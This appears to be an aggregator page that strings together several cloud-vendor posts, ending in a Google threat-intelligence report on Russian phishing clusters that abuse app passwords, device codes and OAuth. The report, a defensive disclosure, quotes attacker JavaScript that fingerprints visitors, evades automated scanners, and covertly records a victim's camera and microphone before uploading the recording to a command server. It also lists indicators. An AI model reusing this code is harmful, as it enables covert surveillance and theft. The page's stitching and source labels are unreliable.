sandbox for a request.\r\nfrom google import genai\r\nfrom google.genai import types\r\n\r\nclient = genai.Client(vertexai=True, project="my-startup-prod", location="us-central1")\r\nresp = client.models.generate_content(\r\n model="gemini-2.5-pro",\r\n contents="Compute the correlation between these two columns: ...",\r\n config=types.(\r\n tools=[types.Tool(code_execution=types.ToolCodeExecution())],\r\n ),\r\n)'), ('language', ''), ('caption', <wagtail.rich_text.RichText object at 0x7fb60725fad0>)])]> 3. Prompt and response filtering. Model Armor sits in front of your model calls and screens for prompt injection, jailbreaks, sensitive-data exfiltration, and off-brand output, all of which are essentially guaranteed the moment you have real users being real users. 4. Behavioral monitoring. Security Command Center with threat detection flags anomalies in agent behavior, a service account suddenly calling an API it's never touched before, an agent reaching out to an unfamiliar external host, an unexpected spike in privileged operations. In near-real-time. None of these are optional once your agent is acting on behalf of a real user or handling real money. Your homework, so to speak: Audit for raw API keys in your repo, your notebooks, and your production runtime. Rotate anything that shouldn't be there. Move any workload that doesn't need a synchronous response to the Batch API. Turn on the Model observability dashboard and put one alert on capacity errors, so the next 429 reaches you before it reaches a customer. Set a spend cap on the project and, and keep an eye out for 50% and 80%alerts, if usage crosses 100% of the budget, Google will pause the service until you manually lift it. Do those three things this week and you're already ahead of most startups shipping AI features. Have a scenario you'd like us to cover next? Reach us at Google Cloud for Startups.

Read original article

Google

August 20, 2026

Announcing quantum-safe key import in Cloud KMS

As enterprises increasingly adopt multicloud architectures, bring your own key (BYOK) has become a fundamental pillar for maintaining data sovereignty and helping protect critical cloud workloads. At the same time, quantum computing has rapidly advanced, and security teams need to re-evaluate how they securely transfer encryption keys across networks. Following our previous announcements of quantum-safe digital signatures and quantum-safe key encapsulation mechanisms (KEMs) in Cloud Key Management Service (Cloud KMS), we are excited to announce the preview of quantum-safe key import in Cloud KMS for software-based cryptographic keys. Our updated quantum-safe BYOK capability, the first step of the next phase of our post-quantum cryptography (PQC) migration timeline, can help you protect your sensitive keys before a cryptographically-relevant quantum computer (CRQC) emerges. As you adopt quantum-safe key import to help protect your keys in transit, you can also monitor your overall post-quantum posture with Cloud KMS PQC insights, now generally available. This high-level visual illustrates your asymmetric keys based on the categorization of the algorithms they use, and can help you plan for future modernization and support long-term resilience. The threat: Store Now, Decrypt Later attacks Traditional key import methods rely on classical asymmetric encryption standards to wrap keys during transit. While these algorithms successfully defend against today’s threats, they will become fundamentally insecure when a viable quantum computer emerges that can potentially decrypt keys that adversaries have intercepted and stored. Quantum-safe key import helps mitigate these store now, decrypt later (SNDL) attacks by wrapping your keys in a quantum-resistant envelope from day one. Building a quantum-resistant envelope for keys The post-quantum transit mechanism now available in Cloud KMS uses hybrid public key encryption (HPKE). Our new import method wraps your sensitive software key material in a quantum-resistant transit envelope. The process integrates into the existing Cloud KMS API workflow to minimize your work: Initiating the job: The client creates a new import job through the Cloud KMS API, requesting a post-quantum HPKE import method. Key generation: The Cloud KMS server generates a post-quantum KEM private key and exposes the corresponding public key to the client. Client-side wrapping: Using a supported cryptographic library (such as Tink or OpenSSL), the client executes an HPKE Seal() operation. This encapsulates the public key to establish a shared secret, derives an ephemeral AES key using HKDF-SHA256, and encrypts the target key material. Submission: The client transmits the encapsulated ciphertext concatenated directly with the encrypted key material back to the Cloud KMS endpoint, which already has quantum-safe data-in-transit protection built-in. Unwrapping: The Cloud KMS server executes an HPKE Open() operation using its private portion of the wrapping key to safely decrypt and help protect the key material within the Cloud KMS boundary. For the KEM layer, you can choose between X-Wing, ML-KEM-768, or ML-KEM-1024. The key derivation layer utilizes HKDF-SHA-256, and the final symmetric wrapper employs AES-256-GCM with standard 12-byte nonces. To learn more about setting up your import jobs, preparing your local key material using external cryptographic libraries, and managing quantum-safe solutions, check out our Cloud KMS quantum safe key import documentation. A critical milestone in Google Cloud's PQC journey The global migration to post-quantum cryptography is a marathon that you take one milestone at a time. Today, you can create your first quantum safe key import job and begin the process of helping make your applications quantum-safe. We welcome your feedback and invite you to reach out to explore how we can support your organization's post-quantum strategy.

Read original article

Google

August 20, 2026

Google is a Leader in the 2026 Gartner® Magic Quadrant™ for Cloud-Native Application Platforms

We are thrilled to announce that Google has been recognized as a Leader for the third year in a row in the 2026 Gartner® Magic Quadrant™ for Cloud-Native Application Platforms (CNAP). We believe this placement in the Leaders quadrant validates our commitment to providing an accessible, developer-centric platform that accelerates onboarding and supports rapid prototyping across modern workloads. Our vision for an application-centric cloud focuses on enabling developers to prioritize writing code and building agents or traditional apps by removing infrastructure complexity. Google Cloud provides a unified execution environment supporting serverless, containerized, and agentic deployment options. We believe our placement highlights Google's unique readiness to power both standard enterprise microservices and the next generation of autonomous AI applications. Some key features and capabilities of our platform are highlighted below. From idea to implementation Generative AI has ushered in a wave of vibe coding, allowing anyone to go from an idea to a deployed application in a fraction of the time it used to take. To make this even smoother, Google Cloud integrates its serverless infrastructure with AI vibe-coding and prototyping tools. We also simplify access to Google Cloud resources with tools like managed MCP servers and agentic skills — packaged sets of instructions, scripts, and resources to teach an AI how to complete specialized, multi-step workflow. One-click prototyping in Google AI Studio: Developers can build and deploy full-stack applications directly within Google AI Studio, making it a great environment for prototyping and experimentation. With a single click, you can instantly package and publish your vibe-coded applications to Cloud Run. Google-managed MCP servers: To enable AI agents to interact with cloud resources, we support official, fully managed remote MCP servers. An example is the Cloud Run MCP server (via run.googleapis.com/mcp), which allows developers to easily launch endpoints and deploy server-side logic. The MCP tools are deployed with a simple config, skipping cloud builds to launch code in seconds, saving valuable developer time. These fully managed servers are integrated with IAM and VPC Service Controls, and they leverage Model Armor for content security. Google's official Skills Repository: Level up your agents with additional, condensed expertise on various Google Cloud technologies. Published and available in Agent Registry, the repository includes skills for Cloud Run, the Well-Architected Pillar (security, reliability, and cost optimization), and more. Ready to try vibe coding yourself? Get hands on with this codelab to build a vibe-coded app and deploy it to Cloud Run. From implementation to enterprise-ready Translating prototypes into production-grade, secure, and cost-effective enterprise software is where Google Cloud excels, with a full suite of developer, architect, and platform engineering tools. From designing your application to optimizing day 2 operations, we offer the services and tools to help you build, operate, and deploy applications across their entire lifecycle, and you have the freedom to build with any language, any library, and any framework. Build Build with Google Antigravity: At Google, we’re simplifying and expanding our development ecosystem behind the Antigravity harness, collapsing developer silos into a unified orchestration layer. By integrating multi-step AI reasoning directly into the developer workflow, Antigravity natively brings local codebase development to our cloud-native application platforms (e.g., Cloud Run). Design and deploy with Application Design Center (ADC): Now, you can bridge the gap between developer velocity and enterprise control, using Application Design Center to eliminate manual Terraform and YAML configuration. This platform engineering component helps teams design, standardize, and deploy template-driven applications on Google Cloud. It is also integrated as part of Gemini Cloud Assist design agent and published as an MCP server. With ADC, you can visually design your architecture using Cloud Run services, databases, and event brokers backed by automated Gemini Cloud Assist security templates. Beyond human-guided design, ADC enables programmatic orchestration at the time of no HITL (Human-in-the-Loop), allowing automated pipelines to provision policy-governed Terraform configurations directly and autonomously. Operate Intelligent investigations: Integrating Gemini Cloud Assist with native telemetry creates an AI-driven framework for Day-2 incidents. When alerts fire, operators engage Gemini Cloud Assist to instantly synthesize logs and metrics, pinpoint root causes, and generate remediations — context that can be handed off to accelerate support escalations. Crucially, IAM permissions strictly govern all AI recommendations, and help to ensure explicit human-in-the-loop approval are required before any infrastructure changes occur. Cost analysis and optimizations: Machine learning algorithms learn natural seasonal traffic cycles to detect cost anomalies within minutes, triggering notifications to protect your bottom line without risking destructive infrastructure shutdown. Deploy Reliability and high availability: Cloud Run is a regional service by default, but you can deploy an app to multiple regions via a single gcloud command. Integrated with service health, Cloud Run automates cross-region failover and failback. If a service in one region becomes unhealthy, traffic is automatically routed to the next-closest healthy region, failing back once the issue is resolved. An open platform: As a long-time and top contributor to the Cloud Native Computing Foundation (CNCF), we operate with an open-source-first strategy. By integrating foundational, community-driven technologies, we help enable application portability for enterprise customers who are increasingly demanding multi-cloud flexibility Ready to start deploying your apps to Google Cloud? Get hands on with these codelabs: Build an app with Antigravity on Cloud Run. Deploy a Cloud Run app via Application Design Center. Optimize application costs with Gemini Cloud Assist. From enterprise-ready to autonomous AI agents are software’s next frontier. They offer more than just increased productivity and efficiency; they can unlock exponential growth. To provide enterprises with robust agentic deployment options, Google Cloud provides a dedicated infrastructure stack tailored specifically to host, govern, and secure autonomous agent fleets. This stack seamlessly integrates with our Agent Development Kit (ADK) as well as other leading agentic frameworks to give developers maximum flexibility. Gemini Enterprise Agent RuntimeAt the core of this stack is Gemini Enterprise Agent Platform and its dedicated Agent Runtime, which delivers the serverless and containerized deployment options you need for enterprise-scale agent development, including the following capabilities: Native personalization: Built-in sessions and memory banks manage context and long-term state, preventing costs from ballooning. Agent observability and tracing: Built on OpenTelemetry (OTel) standards and agentic schemas, turnkey dashboards feature agent topology graphs and interactive trace logs that detail sessions, tool calls, and reasoning paths. Agent evaluation and simulation: Automated simulation tools allow developers to test agents against golden sets with side-by-side comparisons and simulate thousands of interactions to test edge cases. Hosting agents on Cloud RunFor customers requiring additional flexibility, granular control, or specific regulatory compliance, Cloud Run serves as an excellent serverless alternative to host your agents. Some of its latest features include: Cloud Run instances (coming soon): This primitive manages individual, addressable, long-running singleton resources with integrated Cloud Storage volume mounts, allowing persistent background agents to be deployed cost-effectively. Cloud Run sandboxes: Hard-isolated environments spin up in under 500 milliseconds to safely execute untrusted, model-generated code, protecting the host system from unauthorized access. Agent security, governance, and auditabilityTo securely deploy AI agents and prevent unmanaged shadow AI, enterprises need an ironclad governance framework. Google Cloud delivers this through Agent Identity (non-human IAM with cryptographic IDs) to provide an auditable trail of all actions and reasoning; a centralized Agent Registry to manage approved agents, skills, tools and application artifacts, and prevent unauthorized tool integrations; and an Agent Gateway to proxy traffic, enforce Model Armor policies, and actively block destructive actions. These features are available on Agent Runtime today and will be available soon on Cloud Run and Google Kubernetes Engine (GKE). Ready to start deploying agents? Check out various codelabs featuring Gemini Enterprise Agent Platform here. Build the future of cloud-native applications Whether you’re a vibe coder deploying your first full-stack application, a software architect standardizing production microservices, or an enterprise team scaling a fleet of secure AI agents, Google Cloud delivers the simplicity, elasticity, and security you need. Read the full report: Download your complimentary copy of the 2026 Gartner® Magic Quadrant™ for Cloud-Native Application Platforms (CNAP). Magic Quadrant for Cloud-Native Application Platforms, By Mukul Saha, Alex Coqueiro, Prasanna Lakshmi Narasimha, Richard Watson, 3 August 2026 Gartner and Magic Quadrant are trademarks of Gartner, Inc. and/or its affiliates. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google. Gartner does not endorse any company, vendor, product or service depicted in its publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner publications consist of the opinions of Gartner’s business and technology insights organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this publication, including any warranties of merchantability or fitness for a particular purpose.

Read original article

Nvidia

August 20, 2026

How Generative Recommenders Are Redefining Rec Sys at Scale

Recommender systems (RecSys) are one of the most ubiquitous machine learning problems in the consumer internet industry yet notoriously difficult to train and...

Read original article

OpenAI

August 20, 2026

Scaling the data platform powering Chat GPT - Databricks

Scaling the data platform powering ChatGPT Databricks

Read original article

Anthropic

August 20, 2026

Going with the Flow(s): Distinct Clusters Target Individuals of Interest to Russia

Written by: Gabby Roncone, Wesley Shields Overview Google Threat Intelligence Group (GTIG) is tracking three distinct suspected Russian cyber espionage threat clusters abusing legitimate authentication flows to target individuals working in academia, aerospace and defense, governments and think tanks across Europe, as well as academia and think tanks within the United States. Examples of these techniques can be found in our previous blog on UNC6293’s phishing operations. We now track an additional two distinct suspected Russian clusters, UNC7005 and UNC5976, which conduct phishing, abuse OAuth flows, and/or deploy malware to victims. UNC7005 in particular is tied to the hospitality captive portal redirects reported on by Reliaquest and Microsoft. While each group conducts their campaigns differently, they all ultimately demonstrate a focus on abuse of legitimate authentication workflows to compromise accounts. These clusters engage in persistent, adaptive phishing campaigns, using sophisticated social engineering tactics to compromise personal accounts across multiple platforms. Because these operations abuse legitimate authentication flows which may not immediately seem like phishing attempts to users, GTIG is raising awareness about these social engineering campaigns targeting individuals so that targets can more readily recognize malicious outreach. UNC6293 We assess with moderate confidence that UNC6293 is a sub cluster of ICE RELIC (formerly APT29) responsible for initial access operations. UNC6293 operations were initially reported in June 2025 (also by Citizen Lab) as an aggressive app password phishing campaign against prominent individuals that are critical of Russia. App passwords are passcodes a user can set which gives a less secure app or device permission to access an account. In cases of app password phishing, attackers attempt to convince targets to set specific app passwords on their accounts, which the attackers then use to gain access to those accounts without needing two-factor authentication (2FA). As part of the previously documented UNC6293 campaign, the attacker impersonated the US State Department and attempted to lure targets into setting an app password named ms.state.gov. The instructions to do this were in a PDF that contained screenshots of the settings UNC6293 wanted the target to use. In the intervening year, UNC6293 has continued to impersonate State Department officials and perform app password phishing. As one example, in October 2025, GTIG observed UNC6293 using a PDF lure document that contained the exact same screenshots as observed in June 2025, including the ms.state.gov reference. While in 2025, the attacker requested that the victims share the app password back to them via email, in these newer operations, the attacker asked for it to be entered into an authentication form on an otherwise legitimate looking website. Figure 1: Changed text in new lure document UNC6293 phishing campaigns tend to be small in scope, usually targeting fewer than five users at a time, and the application names and lures observed by GTIG tend to focus on diplomatic themes and upcoming conferences or meetings, such as those documented in December 2025 by Volexity. Over time, UNC6293 continued impersonating the U.S State Department while incorporating OAuth phishing into their repertoire. In June 2026, GTIG observed OAuth phishing where UNC6293 requested targets share either the full URL or “verification code” after performing a legitimate login to an external provider. By providing the requested verification code the target would grant UNC6293 access to the account. Figure 2: UNC6293 requesting “verification code” on a phishing page, at foreignrelations[.]us UNC7005 UNC7005 (aka STORM-2945) is a threat cluster identified in February 2026 that primarily targets academia, diplomatic, and nonprofit personnel across Ukraine, Western Europe, and the US Although this group shares many high-level similarities with UNC6293, including targeting overlaps, we are tracking it separately due to its lower sophistication and poor operational security, infrastructure with divergent characteristics, and incorporation of malware. Similarly we assess with moderate confidence that UNC7005 is another initial access cluster connected to ICE RELIC. App Password Phishing Since at least February 2026, UNC7005 has conducted highly selective app password phishing operations targeting individuals of interest to the Russian state. These operations use similar social engineering tactics to UNC6293, but differ in that the app passwords used appear to be unique per target in all observed cases except one. They are specific to the theme used when social engineering the target, such as referencing the type of activity the target is supposedly engaging in (i.e. secure file sharing) and/or the organization UNC7005 is masquerading as. Figure 3: Social engineering landing page used in a UNC7005 operation Device Code Phishing UNC7005 also conducts device code phishing operations for both Microsoft and WhatsApp accounts. The themes of these phishing waves often involve invitations for calls with individuals from notable organizations related to the target’s field or, most recently, invitations to diplomatic events and conferences. Microsoft Device Code Phishing UNC7005 initially delivers Microsoft device code phishing attempts via email, which are sometimes sent from the attacker-controlled domains they create to masquerade as legitimate events and organizations. The emails contain links to these attacker websites which often use similar templates. For example, UNC7005 initially re-used the website template from a previous “embassy invite” themed operation in late April 2026 in a different operation spoofing the legitimate GLOBSEC forum in May 2026. Figure 4: Landing page spoofing GLOBSEC Upon accessing the webpage, the target’s system is fingerprinted, likely to check for an automated scanner accessing the page. (function(){ var fp = { tid: "3311a310cd4f40d4", sw: screen.width, sh: screen.height, tz: Intl.DateTimeFormat().resolvedOptions().timeZone, lang: navigator.language, plat: navigator.platform, cores: navigator.hardwareConcurrency || null, mem: navigator.deviceMemory || null, touch: navigator.maxTouchPoints || 0, }; fetch('/fingerprint', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify(fp), keepalive: true, }).catch(function(){}); Figure 5: Initial system fingerprint for analysis evasion code_block <ListValue: []> The target is prompted to confirm their attendance to the conference and register. The registration process is thorough, and notably contains an epicurean wine selection, which was a theme in multiple previous ICE RELIC-linked phishing campaigns. Figure 6: Registration form before “verification” via device code Figure 7: Epicurean wine selection Upon filling out the form, the target is once again prompted to submit their identity verification. Notably, in the GLOBSEC example, the text refers to “Embassy security policy” rather than GLOBSEC - an artifact from a previous operation. Figure 8: “Identity Verification” prompt after registration Figure 9: GLOBSEC lure displaying device code after registration Within days of identifying this activity, we observed the actor actively make changes to the operation. Citing technical difficulties in the page text, UNC7005 revised the template they used for social engineering, modifying the questions asked to the target as well as the color scheme (). Figure 10: GLOBSEC re-do This time, UNC7005 included a script in the main registration page to attempt to detect and evade automated analysis efforts. (function(){ var h = false; try { // webdriver flag — set by ChromeDriver, Puppeteer, Selenium if (navigator.webdriver) h = true; // Headless Chrome has no plugins at all // Headless Chrome / PhantomJS often have no languages if (!h && (!navigator.languages || navigator.languages.length === 0)) h = true; // Chrome-specific runtime object absent in headless older builds if (!h && typeof window.chrome === 'undefined' && /chrome/i.test(navigator.userAgent)) h = true; // Permission query behaves differently in headless if (!h && navigator.permissions) { navigator.permissions.query({name:'notifications'}).then(function(r){ if (r.state === 'denied' && Notification.permission === 'default') { document.documentElement.innerHTML = ''; window.stop(); } }).catch(function(){}); } } catch(e) { h = true; } if (h) { document.documentElement.innerHTML = ''; window.stop(); } })(); Figure 11: Second system fingerprint for analysis evasion WhatsApp Device Linking (and More) In May and June 2026, UNC7005 conducted social engineering operations spoofing WhatsApp. The phishing pages distributed by the attacker lure targets into linking their WhatsApp accounts with an attacker controlled device in order to join a secure WhatsApp call, chat, or document share. The attacker also attempts multiple other methods of compromise after the device is linked. Figure 12: WhatsApp compromise flow Upon accessing the page, the target is prompted to provide a phone number. The phone number is used to create a legitimate WhatsApp device link request with the attacker device, and then displays the legitimate QR and linking code to the target alongside instructions to the user to link their device. Figure 13: Malicious landing page for WhatsApp device linking After the target successfully links their account to the attacker's WhatsApp device, the phishing page displays an additional prompt to the user to either join a voice call, encrypted chat, or download a file. Figure 14: Post-Compromise “Voice Call” If the target joins the voice call, malicious JavaScript to record target audio and video is triggered. The webpage presents a fake voice call with a ring for a limited amount of time while the audio and video are recorded. The recording would then be sent to the attacker command-and-control (C2) endpoint /api/code/<unique user session id>/recording when the call “fails”. function startMediaRecording() { if (!navigator.mediaDevices || !navigator.mediaDevices.getUserMedia) { return Promise.resolve(); } return navigator.mediaDevices.getUserMedia({ video: true, audio: true }) .then(function(stream) { mediaStream = stream; var selfVideo = document.getElementById('self-video'); var selfView = document.getElementById('self-view'); if (selfVideo && selfView) { selfVideo.srcObject = stream; selfView.style.display = ''; } recordedChunks = []; var options = { mimeType: 'video/webm;codecs=vp8,opus' }; if (!MediaRecorder.isTypeSupported(options.mimeType)) { options = { mimeType: 'video/webm' }; if (!MediaRecorder.isTypeSupported(options.mimeType)) { options = {}; } } mediaRecorder = new MediaRecorder(stream, options); mediaRecorder.ondataavailable = function(e) { if (e.data && e.data.size > 0) recordedChunks.push(e.data); }; mediaRecorder.start(1000); }) .catch(function() { }); } [...] function uploadRecording() { if (mediaStream) { mediaStream.getTracks().forEach(function(t) { t.stop(); }); mediaStream = null; } if (!recordedChunks.length) return; var blob = new Blob(recordedChunks, { type: recordedChunks[0].type || 'video/webm' }); recordedChunks = []; var formData = new FormData(); formData.append('recording', blob, 'recording_' + sessionId + '.webm'); fetch('/api/code/' + sessionId + '/recording', { method: 'POST', body: formData }) .then(function(r) { if (!r.ok) throw new Error('Upload failed'); }) .catch(function() { return fetch('/api/code/' + sessionId + '/recording', { method: 'POST', body: formData }); }) .then(function(r) { if (r && !r.ok) throw new Error('Upload failed'); }) .catch(function() {}); } Figure 15: Malicious JavaScript to record audio and visual of target and upload to C2 The phishing page may also present the target with a fake “encrypted chat” option after successful device linking. The JavaScript first renders chat credentials and an additional login URL with uniform resource identifier (URI) /chat/login. It prompts the user to copy the username and password presented to them to log in on the secondary URL. If the target was presented with a file transfer lure and successfully linked their WhatsApp account, the web page renders a file download button. GTIG is unable to assess what file may have been staged for download at this time. Browser Stealers & Malware-as-a-Service (MaaS) In late May 2026, UNC7005 conducted a much broader phishing wave than any we had previously observed. This operation targeted prominent, mostly US based academics, diplomats, and researchers focused on Russia and former Soviet states. The email address used by the attacker in this operation was almost identical to one used in a UNC6293 operation in June 2025. In this operation, UNC7005 distributed malicious URLs through phishing emails. If the target browsed to the URL from a Windows or macOS device, it directed targets to a landing page spoofing a “summit” related to a resolution to support Ukraine. If not, it displayed an error to the user and requested that they switch to another OS for compatibility. Figure 16: Landing page prompting targets to download malware The website was more elaborately built to social engineer the target, containing information about the various parts of the resolution and even contained contact information for the threat actor for questions or technical difficulties. If the target clicked the button to download a “Summit Companion App” to read the full resolution on Ukraine, they were served infostealer malware based on the OS indicated in the target’s User Agent. Windows option If the User Agent indicates that the target is browsing from a machine running Windows, the malicious webpage serves a sample of VIDAR to the target (). This sample is an obfuscated Go binary with a C2 of 107.189.18[.]7. VIDAR is an infostealer operated as a Malware as a Service (MaaS) which primarily targets sensitive information stored in browsers, such as credentials, stored payment information, cookie information, and saved addresses, which it then sends to the C2 in plaintext. Mac option If the User Agent indicates that the target is browsing from a machine running macOS, the malicious webpage served a sample of ATOMIC to the target (). ATOMIC (aka AtomicStealer) is a macOS infostealer operated as a MaaS and also targets sensitive browser information. OAuth Phishing Cloud Projects In early August 2026, UNC7005 began Google account OAuth phishing operations using cloud infrastructure. Beginning on July 31, 2026, UNC7005 registered domains spoofing the legitimate Finnish Operations Center (FOC), which supports Finnish companies in the defense and security markets, specifically in the context of the North Atlantic Treaty Organization (NATO). Between August 6 and August 13, 2026, UNC7005 sent targeted phishing emails linking to an attacker-controlled domain to targets in or related to the European defense industry. Figure 17: Landing page spoofing Finnish Operations Center, prompting target to sign in and gain access to a resource Upon clicking “Get Access” or “Sign in With Google”, the target is redirected to a legitimate Google OAuth login page which prompts the target to sign in to their account to continue. If the target authenticates, they are redirected to an attacker-controlled, testing mode, unverified cloud project which is likely used to steal authentication tokens that grant the attacker access to the target account. Figure 18: Google OAuth login before redirect to attacker-controlled cloud project Other OAuth Phishing In early August 2026, GTIG identified a highly targeted phishing operation in which UNC7005 sent legitimate Microsoft OAuth URLs directly to targets. The attacker email used in this operation was also used in the cloud project OAuth phishing operations. UNC7005 and the Hospitality Captive Portal Campaign In late April 2026, GTIG began tracking UNC7005 infrastructure mimicking Microsoft authentication resources. As each domain appeared to be operationalized by the threat actor, GTIG took actions to add that infrastructure to the Safe Browsing blocklist. Consistent with public reporting, in mid-July 2026, GTIG began observing users redirected to this attacker infrastructure from captive portals associated with hotels and conference centers. On July 23, 2026, Reliaquest published a blog analyzing domain name system (DNS) requests showing captive portal redirects to attacker-controlled login pages spoofing Microsoft authentication resources. Later, on July 31, 2026, Microsoft detailed Midnight Blizzard activity leveraging captive portals on hospitality sector networks to serve malware or gain access to Microsoft accounts via device code phishing. For the duration of its lifetime, the set of infrastructure used in the captive portal campaign appeared to be used in multiple ways by the threat actor. GTIG linked this infrastructure directly to the other authentication-focused and malware operations conducted by UNC7005 dating back to April 2026. Figure 19. Connections between captive portal campaign and other UNC7005 activity A domain linked to the hospitality captive portal domain shares an Internet Protocol (IP) resolution with an UNC7005 domain used in an earlier device code phishing operation. Between July 16 and July 23, 2026, UNC7005 registered three Microsoft Outlook Web Access (OWA) themed domains (owa-ms365[.]com, m365-owa[.]com, and ms365-device[.]com), which were later linked to the hospitality captive portal campaign, using the email chikolimdrid@gmail.com. That attacker email was previously used to register an earlier domain masquerading as Microsoft, ms365-live.com which resolved to IP 104.194.159[.]150. In April 2026, a domain used in the GLOBSEC-themed Microsoft device code phishing operation previously discussed in this blog, my-invite[.]org, resolved to IP 104.194.159[.]150. The actor also used additional domains spoofing Microsoft services in other operations. An earlier attacker-controlled domain spoofing Microsoft in late April 2026 (statistic-ms[.]live) was used by UNC7005 as C2 for Go malware we call ENGINELIGHT. This malware was sent in a limited phishing operation in early May 2026 from the attacker-controlled account bounce@chamber-ua.org, along with a domain spoofing WhatsApp (wa-connect[.]eu). Additionally, the attacker email used to register statistic-ms[.]live (keyereaonkendrick4@gmail.com) was used in the previously documented MaaS operation in late May 2026. We have also observed tooling overlaps between campaigns conducted by UNC7005 and the tools reported to have been deployed in the captive portal operation. Samples of the CHERRYPIE PowerShell infostealer (also known as ChocoShell) contain numerous artifacts suggesting the malware is generated by a large language model (LLM). The prolific function comments mention an infostealer and specific function offsets noting functionality are located in the binary. Given GTIG’s observation of this threat actor leveraging MaaS in operations and functional overlaps between the malware families, such as consistency in types of data targeted by the malware, we suspect CHERRYPIE may be based on an infostealer purchased from MaaS operators. UNC5976 GTIG began tracking OAuth related activity from UNC5976, a suspected Russian cyber espionage cluster with an authentication focus, in March 2026. We believe this cluster to be distinct from UNC6293 and UNC7005. One of the main themes of UNC5976 operations was the use of OAuth phishing techniques and automation of token collection via abuse of cloud infrastructure. To perform these OAuth phishing campaigns, UNC5976 purchased domains, usually using file sharing related domain names, and then created a cloud project related to that domain. These domains host a fake file sharing page. After a target visits the page for a few seconds, the page displays a pop up login dialog. Figure 20: Fake file sharing page If the target clicks the “Continue with Google” link they are taken to a legitimate Google OAuth login page, asking the target to sign in to continue: Figure 21: OAuth login page from verify-drive[.]com After authenticating, the target was redirected to a Google Cloud project URL. The cloud project hosted malicious scripts that retrieve the authentication token from the URL and save it for the operator to later retrieve. Within approximately three months of initial discovery and disruption by GTIG, UNC5976 created at least twelve new domains and related infrastructure. In response, GTIG took steps to disable these cloud projects and disrupt these phishing activities. GTIG now assesses that UNC5976 is migrating away from Google infrastructure to other providers to host part of their phishing infrastructure. In addition to these phishing pages, we have also observed UNC5976 leverage a malicious Excel plugin, which we named HEADRUSH. In April 2026, GTIG observed a HEADRUSH sample () that ultimately led to an HTML Application (HTA) downloader. UNC5976 distributed this malware using a domain that impersonated a research institute in Ukraine and may have targeted a Ukrainian aerospace and imaging company. Unfortunately, GTIG was unable to determine the full extent of the infection chain at the time. Attribution GTIG assesses with high confidence that these three threat clusters - UNC6293, UNC7005, and UNC5976 - possess a Russian nexus, based on high-level targeting patterns, phishing themes, and shared operational techniques. While these operations often appear unique on the surface, several high-level TTPs used by UNC6293 and UNC7005 harken back to older, attributed ICE RELIC phishing operations between 2021 and 2024. ICE RELIC, UNC6293, AND UNC7005 GTIG assesses with moderate confidence that UNC6293 and UNC7005 are related to a subcluster of ICE RELIC that we associate with initial access operations. As such, UNC6293 and UNC7005 share operational methodologies but operate different infrastructure and tolerate different thresholds of OPSEC. There is significant overlap in target industries (academia, NGOs, diplomacy, and defense) and geographic regions between historical ICE RELIC phishing operations and current UNC6293 and UNC7005 campaigns. These groups continue to use specific legacy themes, such as diplomatic event invitations and specific references to wine, which have previously been documented in ICE RELIC activity. All clusters heavily rely on commercial residential proxies for post-compromise activity. Distinct, but noteworthy: UNC5976 UNC5976 remains distinct from the UNC6293 and UNC7005 clusters, potentially reflecting differing strategic mandates and potential alignment with alternative Russian intelligence services. Its operational focus is primarily centered on the military, aerospace, defense industrial base, and NGOs/think tanks. Much of the group’s geographic targeting has centered on Ukraine and Armenia. UNC5976 uses dedicated infrastructure for post-compromise activity rather than residential proxies. UNC5976 has a much heavier malware and tooling footprint than the ICE RELIC-linked clusters, despite also conducting OAuth operations. Remediation and Hardening At Google, we prioritize user safety. Google will actively disable known actor accounts and where possible, secure victims to remove access to known compromised accounts. We have taken action against infrastructure used to host malicious content in these operations. We strongly recommend users to not proceed past warnings for suspicious websites. Check the URL in your browser before entering credentials or authenticating to any website. Always contact official organizers directly using contact details found outside of the invitation to confirm the legitimacy of any invitation from an unknown contact. Although outreach over email or messenger applications may come from someone who appears to be a legitimate person, please consider the possibility that the persona may be spoofed. App passwords are not recommended and unnecessary in most cases. App passwords are not tools for account or identity verification. Do not share an app password with anyone else. We recommend revoking any legacy app passwords tied to devices that are lost, stolen, or no longer in use. If you believe you may have set an app password related to this campaign, follow instructions to remove app passwords from your account as soon as possible. App passwords can be removed at any time. In specific scenarios, to protect users from deceptive apps, we display a warning “unverified app” screen before showing users the OAuth consent screen for authentication for unverified, testing mode cloud projects with permissions scopes considered sensitive. High-risk users should consider Google’s enhanced security resources such as the Advanced Protection Program (APP). Participation in the APP prevents accounts from creating app passwords due to higher security requirements. Enterprise customers of Google Cloud can disable App Specific Passwords by restricting 2-Step verification to “Only Security Keys” or enrolling users into the Advanced Protection Program. Threat actors are continually targeting victim’s personal messaging applications and performing device linking attacks. Organizations and high risk individuals relying on these applications should continue to harden defences by: Enforcing registration locks and two factor authentication where possible to prevent an adversary from registering an account via stolen SMS verification codes Establish routine device audit checks for “linked devices” on both corporate and personal devices Leverage Safety numbers/codes to validate users via off platform communication channels Outlook and Implications These clusters of Russia’s authentication-focused cyber espionage operations target multiple types of authentication using legitimate features and infrastructure, ranging from app passwords to device linking. In particular, their creative abuse of legitimate features to compromise accounts makes tracking legitimate and malicious account access more challenging. The accounts these groups target are often personal, rather than corporate domain-joined accounts, creating a visibility gap for monitoring compromise from an organizational perspective. The likely use of encrypted messenger applications instead of email for initial outreach also presents a challenge to defenders hoping to track and remediate abuse. The combination of these tactics not only enables the attacker to conduct quick-turnaround exfiltration operations, but also presents opportunities for the attacker to further phish targets of interest from compromised, legitimate accounts. The tactics adopted by these actors obfuscate threat actor activity and make attribution more challenging. Although GTIG now tracks more UNC6293-controlled infrastructure than we did in our previous analysis, the volume of infrastructure that they use is still limited in comparison to other Russian espionage operations. UNC7005’s use of MaaS and LLMs to enable malware operations further pushes these operations into attribution and remediation gray areas. These choices also lessen the time needed to develop and stage tooling for operations, enabling fast-turnaround operations with bespoke tools. As a result of these changes in modus operandi by Russian-state backed attackers, individuals working in the target verticals of these clusters must remain wary of any outreach by unverified, though seemingly familiar or legitimate, personas or organizations. Acknowledgements We would like to thank partners across the industry for their collaboration in helping to track and disrupt parts of these operations, including but not limited to our partners at Anthropic, Black Lotus Labs at Lumen Technologies, Microsoft Threat Intelligence Center (MSTIC), and the Polish Military Counterintelligence Service (SKW) and WhatsApp. Indicators of Compromise (IOCs) To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users. Network Indicators Indicator Attribution Other Notes dosportal.app 